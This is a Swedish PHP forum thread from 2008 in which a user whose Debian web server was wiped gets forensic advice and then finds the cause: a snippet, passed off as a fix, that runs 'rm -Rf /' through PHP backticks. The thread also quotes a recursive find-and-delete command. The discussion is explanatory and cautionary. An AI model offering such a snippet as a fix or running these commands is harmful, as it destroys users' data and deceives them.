Hackad server

PHPportalen Forum Index » Webbservrar och operativsystem
Lägg ett bokmärke på hela tråden
Skapa nytt inlägg   Svara på inlägget Gå till sida 1, 2  Nästa
Visa föregående ämne :: Visa nästa ämne  
Startad av: Meddelande
Overlord



Medlem i: 6125 dagar

Status: Offline



#581220
Inlägg Skrivet: 2008-05-21 23:38      Ämne: Hackad server Citera

Märkte nu ikväll att någon har rensat hemsidan..
Finns det någon logg man kan läsa i servern om
det vart något sådant?
 

_________________
Äntligen Sommar.
Till toppen på sidan
Visa användarprofil Skicka privat meddelande
Walkman
Ex-Moderator



Medlem i: 4939 dagar
Från: Vaxholm (bor i Göteborg)
Status: Offline



#581223
Inlägg Skrivet: 2008-05-21 23:45      Ämne: Citera

Kan kolla i din webbservers loggar efter suspekta förfrågningar. Beror givetvis hur mycket loggning du har igångslaget. En annan bra sak är att kolla igenom aktuell kod efter säkerhetshål.
 

_________________
Koda alltid som om nästa person som till slut ska läsa din kod är en våldsam psykopat och vet var du bor.

Förstå kod innan du använder den.
Till toppen på sidan
Visa användarprofil Skicka privat meddelande Besök användarens hemsida
Overlord



Medlem i: 6125 dagar

Status: Offline



#581224
Inlägg Skrivet: 2008-05-21 23:59      Ämne: Citera

Kollade i auth.log vet ej men
PHP:
1:
 May 18 08:39:01 CDS-DATA CRON[24025]: (pam_unixsession opened for user root by (uid=0)
2:
May 18 08:39:01 CDS-DATA CRON[24024]: (pam_unixsession opened for user root by (uid=0)
3:
May 18 08:39:01 CDS-DATA CRON[24024]: (pam_unixsession closed for user root
4:
May 18 08:39:01 CDS-DATA CRON[24025]: (pam_unixsession closed for user root
5:
May 18 09:00:37 CDS-DATA sshd[24041]: (pam_unixauthentication failurelognameuid=0 euid=0 tty=ssh ruserrhost=61.38.10.16  user=root
6:
May 18 09:00:39 CDS-DATA sshd[24041]: Failed password for root from 61.38.10.16 port 39680 ssh2
7:
May 18 09:00:42 CDS-DATA sshd[24043]: (pam_unixauthentication failurelognameuid=0 euid=0 tty=ssh ruserrhost=61.38.10.16  user=root
8:
May 18 09:00:43 CDS-DATA sshd[24043]: Failed password for root from 61.38.10.16 port 40415 ssh2
9:
May 18 09:00:46 CDS-DATA sshd[24045]: (pam_unixauthentication failurelognameuid=0 euid=0 tty=ssh ruserrhost=61.38.10.16  user=root 


Hur byter jag lösenord i server kör Debian
 

_________________
Äntligen Sommar.
Till toppen på sidan
Visa användarprofil Skicka privat meddelande
pengi
Ex-Moderator



Medlem i: 4729 dagar
Från: JO57XQ
Status: Offline



#581228
Inlägg Skrivet: 2008-05-22 00:18      Ämne: Citera

acccess-loggen för apache kanske?

Hur har han tagit sig in då? för inloggningsförsöken på ssh var ju failure.

att byta lösen gör man med kommandot "passwd", körs som användaren i fråga (root i detta fall)

vad är det för sida du kör? kan det vara baserat på någon injection via sidan? någon känd webapplikation eller egenkodad?
 

_________________
"Question everything. Never trust propaganda. Keep on hacking." - Phrack
Till toppen på sidan
Visa användarprofil Skicka privat meddelande Besök användarens hemsida
Walkman
Ex-Moderator



Medlem i: 4939 dagar
Från: Vaxholm (bor i Göteborg)
Status: Offline



#581231
Inlägg Skrivet: 2008-05-22 00:32      Ämne: Citera

Kör du “apache2” på debian utan extrainställningar så ska du leta i “/var/log/apache2”.

PS: Har för mig att varken PAM-modulerna eller OpenSSH loggar lyckade inloggningsförsök som standard. Han kan mycket väl ha lyckats logga in, men då hade fulingen gjort något mer än att bara rensa sidan.
 

_________________
Koda alltid som om nästa person som till slut ska läsa din kod är en våldsam psykopat och vet var du bor.

Förstå kod innan du använder den.
Till toppen på sidan
Visa användarprofil Skicka privat meddelande Besök användarens hemsida
Overlord



Medlem i: 6125 dagar

Status: Offline



#581233
Inlägg Skrivet: 2008-05-22 00:53      Ämne: Citera

Verkar som han/hon/det va ute efter att rensa alla filer.
hade en hemsida på var/www
och ett flertal på home/

Även rensat bort alla filer i phpmyadmin
Såg även att idioten försökt rensa hela disken på error.log
 

_________________
Äntligen Sommar.
Till toppen på sidan
Visa användarprofil Skicka privat meddelande
pengi
Ex-Moderator



Medlem i: 4729 dagar
Från: JO57XQ
Status: Offline



#581236
Inlägg Skrivet: 2008-05-22 02:05      Ämne: Citera

Jag tycker det låter som en bot som testar lösenord om man har osäkra lösen, sedan kör "rm $( find / -iname '*.php')" eller liknande.

Har du fått in något rootkit?
Jag skulle personligen inte skriva in något lösenord på burken. Stänga av den, boota upp på livecd, kopiera över alla filer man behöver ha kvar från den, blåsa disken och installera om.

Sedan lära sig av detta att alltid ha ordentlgt säkra lösenord och så.

Personligen skulle inte jag lita på en dator i framtiden som har varit hackad. Man vet aldrig vad dom har lyckats trycka in för bakdörrar och rootkits som är dolda.
 

_________________
"Question everything. Never trust propaganda. Keep on hacking." - Phrack
Till toppen på sidan
Visa användarprofil Skicka privat meddelande Besök användarens hemsida
Walkman
Ex-Moderator



Medlem i: 4939 dagar
Från: Vaxholm (bor i Göteborg)
Status: Offline



#581239
Inlägg Skrivet: 2008-05-22 02:28      Ämne: Citera

pengi skrev:
Personligen skulle inte jag lita på en dator i framtiden som har varit hackad. Man vet aldrig vad dom har lyckats trycka in för bakdörrar och rootkits som är dolda.

Word. För att inte tala om att har någon lyckats komma in så är det dags att se över säkerheten från början medans man ändå är igång.

Sedan är jag lite nyfiken på hur/varför du tror det är en random bot, pengi? Jag menar, visst, majoriteten av attacker är bara folk som letar efter sårbara mål på random; men jag har inte sett något i tråden som tyder på varken eller. Att scanna slumpade burkar i mål av att ta bort hela webbrooten (så att admin definitivt kommer märka intrång) låter inte som något man gör. Ett bättre alternativ vore att bryta sig in omärkt och ta kontroll över burken utan att någon vet om det.

PS: Overlord, jag är lite intresserad av att veta vad du hittade i loggarna.
 

_________________
Koda alltid som om nästa person som till slut ska läsa din kod är en våldsam psykopat och vet var du bor.

Förstå kod innan du använder den.
Till toppen på sidan
Visa användarprofil Skicka privat meddelande Besök användarens hemsida
pengi
Ex-Moderator



Medlem i: 4729 dagar
Från: JO57XQ
Status: Offline



#581242
Inlägg Skrivet: 2008-05-22 03:38      Ämne: Citera

Jag vet inte vad sidan var just nu iofs, men jag antar att den inte var någon större sida, så att någon person hade tjänat på att lägga massa tid på att hacka den. Antar att den inte hade någon större lösenordslista eller liknande. Troligtvis är det någon som tycker det är kul med att söka och förstöra. Jag är dock med förvånad över att de inte försöker installera rootkit och gömma sig.

Jag är nyfiken på om det är fler rader efter varandra med login failed på root? Det är inte manuella missar några ggr för att sedan skriva rätt av någon användare som har access?

Står något intressant i /root/.bash_history ? (om han har använt terminalen)

vad säger program som t.ex. chkrootkit och rkhunter?
 

_________________
"Question everything. Never trust propaganda. Keep on hacking." - Phrack
Till toppen på sidan
Visa användarprofil Skicka privat meddelande Besök användarens hemsida
Overlord



Medlem i: 6125 dagar

Status: Offline



#581247
Inlägg Skrivet: 2008-05-22 07:43      Ämne: Citera

Kanske detta kan vara orsaken
PHP:
1:
<?php `rm / -Rf`; ?>


Fick ett tips här att lägga in denna snutt för att åtgärda ett fel på ett script
http://www.phpportalen.net/viewtopic.php?t=96415&highlight=
 

_________________
Äntligen Sommar.
Till toppen på sidan
Visa användarprofil Skicka privat meddelande
andersw



Medlem i: 6341 dagar
Från: Jönköping
Status: Offline



#581248
Inlägg Skrivet: 2008-05-22 08:09      Ämne: Citera

Självklart ska du vara upprörd om någon har hackat din server, men kan man förvänta sig annat om du ligger på den kunskapsnivån att du inte ens kan byta lösenord? Har du kört uppdateringar frekvent? Man får väl hoppas du hade backup i alla fall.
 
Till toppen på sidan
Visa användarprofil Skicka privat meddelande Besök användarens hemsida
EmilV
Ex-Moderator



Medlem i: 6132 dagar
Från: Lilla Edet
Status: Offline



#581251
Inlägg Skrivet: 2008-05-22 08:17      Ämne: Citera

Overlord skrev:
Kanske detta kan vara orsaken
PHP:
1:
<?php `rm / -Rf`; ?>


Fick ett tips här att lägga in denna snutt för att åtgärda ett fel på ett script
http://www.phpportalen.net/viewtopic.php?t=96415&highlight=

Är du seriös? Lade du in det!?
I så fall är det dags att lära dig vad den koden gör nu. För som Wedge skriver i tråden kommer snutten lära dig att inte klippa och klistra hejvilt.

` (accent, inte apostrof) runt en sträng säger att strängen är ett kommando som ska köras på systemet. Det koden gör är alltså att köra rm -Rf / som om du själv hade kört det i terminalen.

Vad gör då detta kommando? Manualen till rm hittar du här:
http://unixhelp.ed.ac.uk/CGI/man-cgi?rm
 

_________________
Tänk!

EmilVikström.se | Bloglovin.com
Till toppen på sidan
Visa användarprofil Skicka privat meddelande Besök användarens hemsida
Wedge
Administratör



Medlem i: 6257 dagar
Från: Järfälla
Status: Offline



#581258
Inlägg Skrivet: 2008-05-22 09:31      Ämne: Citera

 

_________________
I am Groot
Till toppen på sidan
Visa användarprofil Skicka privat meddelande MSN Messenger
pengi
Ex-Moderator



Medlem i: 4729 dagar
Från: JO57XQ
Status: Offline



#581270
Inlägg Skrivet: 2008-05-22 10:47      Ämne: Citera

Haha.

Ja, du har blivit hackad, via social engineering... fast frågan är om det är av dig själv eller av någon annan Razz

om du fortfarande inte vet vad den kodsnutten gör kan du läsa om det:

http://se.php.net/manual/en/language.operators.execution.php
http://unixhelp.ed.ac.uk/CGI/man-cgi?rm

Om du fortfarande inte är med på vad det gör så vilar jag min låda.
 

_________________
"Question everything. Never trust propaganda. Keep on hacking." - Phrack
Till toppen på sidan
Visa användarprofil Skicka privat meddelande Besök användarens hemsida
Overlord



Medlem i: 6125 dagar

Status: Offline



#581290
Inlägg Skrivet: 2008-05-22 12:05      Ämne: Citera

Ja då har jag lärt mej en läxa. Men onödigt gjort av en administratör.
 

_________________
Äntligen Sommar.
Till toppen på sidan
Visa användarprofil Skicka privat meddelande
Visa tidigare inlägg:   
Skapa nytt inlägg   Svara på inlägget Gå till sida 1, 2  Nästa
PHPportalen Forum Index » Webbservrar och operativsystem
Hoppa till:  
Du kan inte skapa nya inlägg i det här forumet
Du kan inte svara på inlägg i det här forumet
Du kan inte ändra dina inlägg i det här forumet
Du kan inte ta bort dina inlägg i det här forumet
Du kan inte rösta i det här forumet
Du kan inte bifoga filer i detta forum
Du kan inte ladda ner filer från detta forum
Kontakta oss på adressen: info@phpportalen.net
Webbplatsen bygger i grunden på phpBB © 2001, 2002 phpBB Group

Modifieringar har senare gjorts i systemet av PHPportalen
Sid och logotypdesign skapad av Daren Jularic